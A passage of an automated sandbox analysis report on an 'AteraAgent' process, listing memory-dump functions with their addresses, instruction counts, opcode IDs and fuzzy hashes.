                                                                                                                                                                                                                                          • Opcode ID: ab01369f57c526ed57e211857cdc3378d4553a12e4a86ace392c003e31cc5d97
                                                                                                                                                                                                                                          • Instruction ID: 9ea227ecab60ed01d90e3a7898ece81d9868b6444e94180b3ddfb32067ae31c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab01369f57c526ed57e211857cdc3378d4553a12e4a86ace392c003e31cc5d97
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09312970E0A62D9FEBA5EF6888557E9B7F0AF54700F4441E9D04CD32A2DA785E85CF40
                                                                                                                                                                                                                                          Function 00007FFD9B3DD132 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 84de6fde77dc99fd236d8f4422079583d3b77bd0678c02b2b0ed93bf680657a1
                                                                                                                                                                                                                                          • Instruction ID: c277bbac10bcc4abe9c108003e613b29d95092d3692a9ae21ffc99fb10574557
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84de6fde77dc99fd236d8f4422079583d3b77bd0678c02b2b0ed93bf680657a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF11B27190EA8D5FDB92EBB4C425BE8BFB1EF56300F4542BAD048D71A2CE296946C701
                                                                                                                                                                                                                                          Function 00007FFD9B3D483D Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1aa7d8d14344d6ba8cc3ce742684c0664e76f266712f8d9a145517843e61260b
                                                                                                                                                                                                                                          • Instruction ID: 3a8169771e5cb1e39540f15a35d2a8977d79c0da00b58aaabe6525563276e3ea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1aa7d8d14344d6ba8cc3ce742684c0664e76f266712f8d9a145517843e61260b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B11C622F0A6DD4BEB20FF6898B51E93BA1FF85214F0506BAD45C870E3DD6A69458240
                                                                                                                                                                                                                                          Function 00007FFD9B3D79CF Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c5c2ba116217502237e418adc43fcb873a8902b3d7098558ad13ad48e82c54c9
                                                                                                                                                                                                                                          • Instruction ID: 47be1884be3a89d1d0e6cd9941350b46f02460d7414aadffadabcfd663a00ad2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5c2ba116217502237e418adc43fcb873a8902b3d7098558ad13ad48e82c54c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47012D31B05A4D5FE750FBA8A425AED77E0EFC0221B40007AD008D7161EE292D868711
                                                                                                                                                                                                                                          Function 00007FFD9B3D3B7D Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dc0dd468b5834a561aab7d00ca9c20bc136cd827a122185a37e880dcc4d9986c
                                                                                                                                                                                                                                          • Instruction ID: 8c554435c77462611ab3842ac2865767317b8acfb310a7971b0a4417b9b9d6d4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc0dd468b5834a561aab7d00ca9c20bc136cd827a122185a37e880dcc4d9986c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2011CE31E0D68D9FDB51EAA4C4666EEBBB0EF45310F0103BAE109E71D2DF6969488B41
                                                                                                                                                                                                                                          Function 00007FFD9B3D1E9A Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a762ab06d456f59fb5efdbb9ded28128082974702413150f7cbe4685eb2a0cf5
                                                                                                                                                                                                                                          • Instruction ID: bda4fa26877fdd7413bb857bb458290d5732a9a7cb28d1ced74e8c1c11067da0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a762ab06d456f59fb5efdbb9ded28128082974702413150f7cbe4685eb2a0cf5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48115C70D09A6D8FEBB5EBA488653E9B7F1AF54300F0542E9D04C97261DA395E85CB80
                                                                                                                                                                                                                                          Function 00007FFD9B3D84C0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 770307da54e98eff5eb94a00eb9e35687e8d0b7ba6441cd183fe0fdce9b03e8b
                                                                                                                                                                                                                                          • Instruction ID: 304b0658e6c16f865e107fa4d3ac3c564c1b83b472f0b1d741df7e542ae76ce7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 770307da54e98eff5eb94a00eb9e35687e8d0b7ba6441cd183fe0fdce9b03e8b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F11A234E0991C8FDBA4EF98D494AECB7B0EF59311F5111A9D00DE3251DA35AA80CB00
                                                                                                                                                                                                                                          Function 00007FFD9B3D0C89 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d7e00db8519ef9b00d11ec1fd941f81ffbc00c91ab1b2f112a8404e4c4194009
                                                                                                                                                                                                                                          • Instruction ID: 8943a73cba454edee69c9b86a1d230f585467b284f7e972cadcffc96c7171542
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7e00db8519ef9b00d11ec1fd941f81ffbc00c91ab1b2f112a8404e4c4194009
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5301263150F68D5FE725FA3084216EA7790EF40310F4101BEC01ADB2E0DE392D04CA01
                                                                                                                                                                                                                                          Function 00007FFD9B3D0C4A Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e44becd4f187b405d5befaa14ff9b3c7f719a832f29dfb841b3ba823ce82909b
                                                                                                                                                                                                                                          • Instruction ID: 3001942ca599592216c324563d580e94ba4f79892f6142b9728e2104c0d281ba
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e44becd4f187b405d5befaa14ff9b3c7f719a832f29dfb841b3ba823ce82909b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A010831A4E68A5FE36AF7A084362A97691EF81710F4105BEC1099B2F6DE3A5D04CA41
                                                                                                                                                                                                                                          Function 00007FFD9B3D1E7E Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 677e4c24934b03ac6315511a587a2e77dd9cef49d315d377ccb75533260c99ab
                                                                                                                                                                                                                                          • Instruction ID: 675b38fba9b56abc694b1f2bd17c2f83aca35ebca3f6ba4238e582a939f51053
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 677e4c24934b03ac6315511a587a2e77dd9cef49d315d377ccb75533260c99ab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F015270A0AA5D9FEBB1EB788855799BBF4EF48710F0542E9D40CD3161DA396F868B00
                                                                                                                                                                                                                                          Function 00007FFD9B3D1EB6 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1998aec756feb756f5e4065dda4c2b4f4169d85615cc72dacf58c294561d6b10
                                                                                                                                                                                                                                          • Instruction ID: 3bb4d0cf62e8a7777b0679e359fc38f7f79f73105a7fcfd0d32ba2e025e291b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1998aec756feb756f5e4065dda4c2b4f4169d85615cc72dacf58c294561d6b10
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A11A4B0D0962D9FEBA1EB688855BD9B7F4EB58700F4042EA904CE3251DA396FC5CF40
                                                                                                                                                                                                                                          Function 00007FFD9B3D0C1D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d25a0e7ba79da2f0e08d0d8bf9dacb1e4789f6fad519d3bf65b3ea1048d68e9a
                                                                                                                                                                                                                                          • Instruction ID: 178adb744cd7f1e1e668b33b58090deb3c711f0f41633b25941ae5e218bf8249
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d25a0e7ba79da2f0e08d0d8bf9dacb1e4789f6fad519d3bf65b3ea1048d68e9a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D101D670A0E6CA5FE31AFB7484356997B90AF41314F4505BFC1159B6E6DE3E1948C701
                                                                                                                                                                                                                                          Function 00007FFD9B3D1895 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7dda354b49d72bb31bc60c0ada6928697f01f39c587b33bf05b43645d1dc4bbd
                                                                                                                                                                                                                                          • Instruction ID: 8a4836b1e85f48ff9e194220f817371341d44189de58d4ce5ec0f5640db24acf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dda354b49d72bb31bc60c0ada6928697f01f39c587b33bf05b43645d1dc4bbd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D010C30A0A65D8FD769EBA4C4653ADB2B1FF45700F4105FDD00EA76A6CB796A84CF00
                                                                                                                                                                                                                                          Function 00007FFD9B3D1BA7 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 615e8b417e51e5611824096d1893234f6a076721af971e173efa16945e8d4292
                                                                                                                                                                                                                                          • Instruction ID: dae7198b41f3a68235c15aa25dec6bb4acd14b8840fe133a696c0f92f59d786d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 615e8b417e51e5611824096d1893234f6a076721af971e173efa16945e8d4292
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3401C87490552C8FDBA9EF28C895BD977F1EF59301F0441E9900DE72A5CAB49B85CF40
                                                                                                                                                                                                                                          Function 00007FFD9B3D7DC1 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 82070c546e9bd868c1ea932df64256646bcc730fadd1628eb549ccba98dc4350
                                                                                                                                                                                                                                          • Instruction ID: 1fd1c62b389c14d99260b63c7d6801b20d6e61efb9408ae0a60c35090b201271
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82070c546e9bd868c1ea932df64256646bcc730fadd1628eb549ccba98dc4350
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5F0C261D0E7CC5FE352EBB489292E97BB1FF45310F0505BED044C71A2EB285919C741
                                                                                                                                                                                                                                          Function 00007FFD9B3D1CC7 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3e59acdc977b76bbc53f6f95a50c47091014e1c133d5f6574aa1606ed3441a5a
                                                                                                                                                                                                                                          • Instruction ID: 55e55ec416c6f1ee401a0fe68911305140bb5a6d7787a8c1d02e13b0a62f90e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e59acdc977b76bbc53f6f95a50c47091014e1c133d5f6574aa1606ed3441a5a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36F04F30D1A65A5FD762EB7884166BCB7F0AF06B14F5001FCD48A931A3DA3C6E49CA51
                                                                                                                                                                                                                                          Function 00007FFD9B3D32C5 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b95b6af25cd2b7d3ae72d007070abce494798e852272a2e74dd37d93b33171d2
                                                                                                                                                                                                                                          • Instruction ID: 752c2879752f982620d06699883a492109b0601738a1405373ed8f708eb2ce8c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b95b6af25cd2b7d3ae72d007070abce494798e852272a2e74dd37d93b33171d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4F08274D0954D9FDB51EFA480167EDBBF0EF85315F0081B9C008931A1DA3C1A84CB90
                                                                                                                                                                                                                                          Function 00007FFD9B3D1C27 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ea27f74eb6efc18d8cf47572e5701537c56c037e6c7fb18f7a864344588bd44a
                                                                                                                                                                                                                                          • Instruction ID: 9ea6dfa8729b344a8bba7054f9158ed92c0d2130f0062f8719b22d9d2cf98451
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea27f74eb6efc18d8cf47572e5701537c56c037e6c7fb18f7a864344588bd44a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05F08C3490A26C9FD7A1EA70C8903EDBBF0AF41300F4080A8C00C672A5CA791EC8DB00
                                                                                                                                                                                                                                          Function 00007FFD9B3D1C77 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: adf750be62bf9f3244aaac2b5a77926ff66c99f232d4a3ca8d44d6391ea3cfbc
                                                                                                                                                                                                                                          • Instruction ID: 4c9bd2b7a48f2c8ebe68cb8f899214e3609d441ea1efa17b4e0b52babc31335e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adf750be62bf9f3244aaac2b5a77926ff66c99f232d4a3ca8d44d6391ea3cfbc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEF0583090A2689FD761EA7188117EDB7F0AF41300F84C0A8D008672A1CA791A85CF10
                                                                                                                                                                                                                                          Function 00007FFD9B3D192D Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6dc47cd4929e1a29c31fe0714683553c171c3dec98a07dc03aec9dbf93061d7b
                                                                                                                                                                                                                                          • Instruction ID: f60646d3f07576219cd18697976422f1f4f871abaf8b0f81487049aa209dc3ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6dc47cd4929e1a29c31fe0714683553c171c3dec98a07dc03aec9dbf93061d7b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6E01A70A066998FD79AEB24841579876A1EF48710F4001FD940DC72A5DF395E818B00
                                                                                                                                                                                                                                          Function 00007FFD9B3D4A52 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c50c1607cc62a50ae52b58c4b11f0ea91f9ceb35012fabdc45bdbfd3b86d2d8f
                                                                                                                                                                                                                                          • Instruction ID: 66cddad393b7a9dd49740677e6d5d755425b7d5b6411863489cb9f140861a626
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c50c1607cc62a50ae52b58c4b11f0ea91f9ceb35012fabdc45bdbfd3b86d2d8f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8E0BF3460660D8FD794EF64C4656A977A2FF85300F92457CD41DC7292CE369951C700
                                                                                                                                                                                                                                          Function 00007FFD9B3D1DF2 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 190959f4e202bc7447e155e8ba94c249420ed3a0e7837956aa38d61cece8feaf
                                                                                                                                                                                                                                          • Instruction ID: c235eabc1913bbea9033a28633d319ba84440510dcd67c859a92e60d76f404e7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 190959f4e202bc7447e155e8ba94c249420ed3a0e7837956aa38d61cece8feaf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24E08C7094A2999FD7529AB8C8506AEBFF0AF42314F4942A8C844231A2C7BC1D46D710
                                                                                                                                                                                                                                          Function 00007FFD9B3D1F6A Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 364c928d65cecbb9089a2d07109d3bda3a6e5297257f0f1b413e66932733761f
                                                                                                                                                                                                                                          • Instruction ID: a7e0794ef9b077c8940c102afdd52f2a5b06a9e5e78e63705f3f1b4911651410
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 364c928d65cecbb9089a2d07109d3bda3a6e5297257f0f1b413e66932733761f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CD0227050B289BFC322BAB0452208DBBF0AF06200B4140E8D00887172C23DAE42C700
                                                                                                                                                                                                                                          Function 00007FFD9B3D1F8D Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 25bb8f3672bcdd1527747db7f45a342a5fe149efeafa1353984406d98f5eeda4
